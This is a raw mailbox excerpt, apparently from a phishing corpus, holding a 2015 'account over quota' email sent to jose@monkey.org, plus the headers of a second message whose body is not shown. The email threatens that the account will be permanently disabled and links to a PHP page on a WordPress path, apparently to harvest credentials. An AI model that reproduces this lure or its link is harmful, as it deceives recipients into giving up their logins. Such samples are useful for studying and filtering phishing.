From: "ACCOUNT SERVICE" <rsvn.kintex@mvlhotel.com>
Date: Tue, 13 Oct 2015 19:20:38 -0700
X-WB-MSG-ID: 6205321560471904877
X-WB-RES: 0: str=0001.0A150201.561DB8A9.00BE,ss=1,pt=R_F_35437939,fgs=256
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 201

You will not see this in a MIME-aware mail reader.
--===============1529371190==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear jose@monkey.org,
 =


 =

   1969MB	  	  	 2000MB
 We noticed your e-mail account has almost exceed it's limit. And you may n=
ot be able to send or receive messages any moment from now, Click Here to r=
enew your account.    NOTICE:  failure to renew your e-mail account. It wil=
l be permanently disabled.   Thanks, Account Service
--===============1529371190==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P style=3D"WORD-SPACING: 0px; FONT: small ari=
al,sans-serif; TEXT-TRANSFORM: none; COLOR: rgb(34,34,34); TEXT-INDENT: 0px=
; WHITE-SPACE: normal; LETTER-SPACING: normal"><SPAN style=3D"FONT-SIZE: 12=
pt; LINE-HEIGHT: 22px"><FONT color=3D#585858>Dear&nbsp;<B><FONT color=3D#00=
0000>jose@monkey.org</FONT></B>,</FONT></SPAN></P>
<P style=3D"WORD-SPACING: 0px; FONT: small arial,sans-serif; TEXT-TRANSFORM=
: none; COLOR: rgb(34,34,34); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTER=
-SPACING: normal"><SPAN style=3D"FONT-SIZE: 12pt; LINE-HEIGHT: 22px"><FONT =
color=3D#585858><BR></FONT></SPAN></P>
<TABLE style=3D"BACKGROUND-IMAGE: none; WORD-SPACING: 0px; FONT: 24px arial=
,sans-serif; TEXT-TRANSFORM: none; COLOR: rgb(68,68,68); TEXT-INDENT: 0px; =
BACKGROUND-REPEAT: repeat; WHITE-SPACE: normal; LETTER-SPACING: normal; fon=
t-stretch: normal" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY style=3D"WIDTH: 293px; LINE-HEIGHT: 21px">
<TR>
<TD style=3D"PADDING-RIGHT: 0in; BORDER-TOP: black 1pt solid; PADDING-LEFT:=
 0in; BACKGROUND: rgb(255,204,0); PADDING-BOTTOM: 0in; MARGIN: 0px; BORDER-=
LEFT: black 1pt solid; WIDTH: 131.25pt; PADDING-TOP: 0in; BORDER-BOTTOM: bl=
ack 1pt solid; FONT-FAMILY: arial,sans-serif; BORDER-RIGHT-COLOR: rgb(240,2=
40,240)" width=3D175><SPAN style=3D"FONT-SIZE: 12pt; COLOR: rgb(34,34,34); =
LINE-HEIGHT: 22px; FONT-FAMILY: Tahoma,sans-serif">1969MB</SPAN><SPAN style=
=3D"FONT-SIZE: 12pt; COLOR: rgb(34,34,34); LINE-HEIGHT: 22px"></SPAN></TD>
<TD style=3D"BORDER-RIGHT: black 1pt solid; PADDING-RIGHT: 0in; BORDER-TOP:=
 black 1pt solid; PADDING-LEFT: 0in; BORDER-LEFT-COLOR: rgb(240,240,240); P=
ADDING-BOTTOM: 0in; MARGIN: 0px; WIDTH: 18.75pt; PADDING-TOP: 0in; BORDER-B=
OTTOM: black 1pt solid; FONT-FAMILY: arial,sans-serif; BACKGROUND-COLOR: tr=
ansparent" width=3D25><SPAN style=3D"FONT-SIZE: 12pt; COLOR: rgb(34,34,34);=
 LINE-HEIGHT: 22px"></SPAN>&nbsp;</TD>
<TD style=3D"BORDER-RIGHT: rgb(240,240,240); PADDING-RIGHT: 0in; BORDER-TOP=
: rgb(240,240,240); PADDING-LEFT: 0in; BACKGROUND: 0px 50%; PADDING-BOTTOM:=
 0in; MARGIN: 0px; BORDER-LEFT: rgb(240,240,240); PADDING-TOP: 0in; BORDER-=
BOTTOM: rgb(240,240,240); FONT-FAMILY: arial,sans-serif" vAlign=3Dtop>&nbsp=
;</TD>
<TD style=3D"BORDER-RIGHT: rgb(240,240,240); PADDING-RIGHT: 0in; BORDER-TOP=
: rgb(240,240,240); PADDING-LEFT: 0in; BACKGROUND: 0px 50%; PADDING-BOTTOM:=
 0in; MARGIN: 0px; BORDER-LEFT: rgb(240,240,240); PADDING-TOP: 0in; BORDER-=
BOTTOM: rgb(240,240,240); FONT-FAMILY: arial,sans-serif"><B><SPAN style=3D"=
FONT-SIZE: 12pt; COLOR: rgb(34,34,34); LINE-HEIGHT: 22px; FONT-FAMILY: Taho=
ma,sans-serif">2000</SPAN></B><SPAN style=3D"FONT-SIZE: 12pt; COLOR: rgb(34=
,34,34); LINE-HEIGHT: 22px; FONT-FAMILY: Tahoma,sans-serif">MB</SPAN><SPAN =
style=3D"FONT-SIZE: 12pt; COLOR: rgb(34,34,34); LINE-HEIGHT: 22px"></SPAN><=
/TD></TR></TBODY></TABLE>
<DIV style=3D"WORD-SPACING: 0px; FONT: 24px arial,sans-serif; TEXT-TRANSFOR=
M: none; COLOR: rgb(68,68,68); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTE=
R-SPACING: normal; font-stretch: normal"><SPAN style=3D"FONT-SIZE: 12pt; LI=
NE-HEIGHT: 22px"><FONT color=3D#4d4d4d>We noticed your e-mail account has a=
lmost exceed it's limit.&nbsp;</FONT></SPAN><FONT color=3D#4d4d4d size=3D3>=
And you may not be able to send or receive messages any moment from now,</F=
ONT></DIV>
<DIV style=3D"WORD-SPACING: 0px; FONT: 24px arial,sans-serif; TEXT-TRANSFOR=
M: none; COLOR: rgb(68,68,68); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTE=
R-SPACING: normal; font-stretch: normal"><A title=3D"" style=3D"BACKGROUND-=
IMAGE: none; COLOR: rgb(34,34,34); BACKGROUND-REPEAT: repeat; outline-width=
: medium" href=3D"http://www.dubzilla.co.uk/wp-includes/theme-zompact/tobi/=
conflict.php?Email=3Djose@monkey.org" target=3D_blank><SPAN style=3D"COLOR:=
 rgb(0,104,207)"><FONT color=3D#4d4d4d size=3D3>Click Here to&nbsp;renew yo=
ur account.</FONT></SPAN></A><FONT color=3D#4d4d4d size=3D3>&nbsp;</FONT></=
DIV>
<DIV style=3D"WORD-SPACING: 0px; FONT: 24px arial,sans-serif; TEXT-TRANSFOR=
M: none; COLOR: rgb(68,68,68); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTE=
R-SPACING: normal; font-stretch: normal">&nbsp;</DIV>
<DIV style=3D"WORD-SPACING: 0px; FONT: 24px arial,sans-serif; TEXT-TRANSFOR=
M: none; COLOR: rgb(68,68,68); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTE=
R-SPACING: normal; font-stretch: normal"><FONT color=3D#4d4d4d size=3D3><B>=
<U>NOTICE:</U>&nbsp;</B></FONT></DIV>
<DIV style=3D"WORD-SPACING: 0px; FONT: 24px arial,sans-serif; TEXT-TRANSFOR=
M: none; COLOR: rgb(68,68,68); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTE=
R-SPACING: normal; font-stretch: normal"><FONT color=3D#4d4d4d size=3D3>fai=
lure to renew your e-mail account. It&nbsp;will be permanently disabled.</F=
ONT></DIV>
<DIV style=3D"WORD-SPACING: 0px; FONT: 24px arial,sans-serif; TEXT-TRANSFOR=
M: none; COLOR: rgb(68,68,68); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTE=
R-SPACING: normal; font-stretch: normal">&nbsp;</DIV>
<DIV style=3D"WORD-SPACING: 0px; FONT: 24px arial,sans-serif; TEXT-TRANSFOR=
M: none; COLOR: rgb(68,68,68); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTE=
R-SPACING: normal; font-stretch: normal"><SPAN style=3D"FONT-SIZE: 12pt; LI=
NE-HEIGHT: 22px"><FONT color=3D#4d4d4d>Thanks,</FONT></SPAN></DIV>
<DIV style=3D"WORD-SPACING: 0px; FONT: 24px arial,sans-serif; TEXT-TRANSFOR=
M: none; COLOR: rgb(68,68,68); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTE=
R-SPACING: normal; font-stretch: normal"><SPAN style=3D"FONT-SIZE: 12pt; LI=
NE-HEIGHT: 22px"><FONT color=3D#4d4d4d>Account Service</FONT></SPAN></DIV><=
/BODY></HTML>
--===============1529371190==--

From cs@sevr.com  Thu Oct 15 12:59:13 2015
Return-Path: <cs@sevr.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 19F94F4169
	for <jose@login.monkey.org>; Thu, 15 Oct 2015 12:59:13 -0500 (CDT)
Received: from smtpin18.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay02.b.hostedemail.com (Postfix) with SMTP id AC6E327AB92
	for <jose@login.monkey.org>; Thu, 15 Oct 2015 17:59:12 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70745103744.18.horse01_8a7c392327c19
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 30,2,0,3e2a4e9ac43bd76e,d41d8cd98f00b204,cs@sevr.com,:,RULES_HIT:2:41:46:72:150:152:355:379:800:962:967:969:973:978:983:988:989:1189:1208:1221:1260:1263:1313:1314:1345:1381:1431:1433:1434:1437:1516:1517:1535:1571:1575:1588:1589:1594:1676:1710:1714:1730:1747:1777:1792:1801:1803:2194:2198:2199:2200:2393:2525:2527:2538:2539:2553:2568:2610:2627:2682:2685:2859:2890:2892:2895:2901:2902:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3154:3245:3350:3586:3804:3865:3866:3867:3870:3872:3873:3889:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4050:4120:4321:4605:5007:6117:6119:6238:6261:6300:6650:6671:6678:7266:7652:7809:8550:8568:8583:8603:8778:8957:9025:9080:9121:9388:9908:10346:10398:10484:10522:11233:11256:11473:11480:11651:11657:11658:11914:11984:12043:12050:12114:12295:12517:12519:12555:12740:13007:13139:13374:14096:14246:21080:21094,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:
X-HE-Tag: horse01_8a7c392327c19
X-Filterd-Recvd-Size: 9889
Received: from smtp-out0128-sv3.telkom.net (smtp-out0128-sv3.telkom.net [125.160.6.128])
	by imf08.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 15 Oct 2015 17:59:11 +0000 (UTC)
Received: from [222.124.18.76] (helo=fm1.smtp.telkom.net)
	by smtp-out0128-sv3.telkom.net with esmtps (TLSv1:AES256-SHA:256)
	id 1Zmmnv-0001ac-Bt
	for jose@monkey.org; Fri, 16 Oct 2015 00:59:03 +0700
Received: from IrfanPC ([180.254.108.73])
	by fm1.smtp.telkom.net  with SMTP id t9FHx0sJ023509-t9FHx0sK023509
	for <jose@monkey.org>; Fri, 16 Oct 2015 00:59:01 +0700
